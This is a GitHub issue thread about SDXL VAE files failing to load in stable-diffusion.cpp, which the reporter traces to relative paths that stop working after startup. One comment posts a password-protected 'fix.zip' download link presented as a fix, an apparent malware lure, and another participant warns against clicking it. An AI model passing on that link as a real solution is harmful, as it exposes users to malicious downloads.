### ISSUE TITLE
Problems with loading VAE model for SDXL (was working with earlier versions)

### ISSUE THREAD

**Issue by Jonathhhan** [leejet/stable-diffusion.cpp#424]
This is written in the console:

```
stable-diffusion.cpp:223  - loading vae from 'data/models/vae/sdxl_vae.safetensors'
model.cpp:799  - unknown format data/models/vae/sdxl_vae.safetensors
stable-diffusion.cpp:225  - loading vae from 'data/models/vae/sdxl_vae.safetensors' failed
```

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by stduhpf** [comment]
@Jonathhhan I hope you didnt click the other guy's link.

**Comment by Jonathhhan** [comment]
@stduhpf thanks. Luckily I did not.

**Comment by Jonathhhan** [comment]
Still have the issue with the vae model, but it works if fixed vae is integrated: https://civitai.com/models/117188/sdxlfixedvaefp16remove-watermark

**Comment by Jonathhhan** [comment]
I found the reason for my Issue: If I do not load the model directly after starting the program, I need to use the absolute path (just not sure, why it works with the relative path at the programs start). That seems true for every model (vae / esrgan etc.).
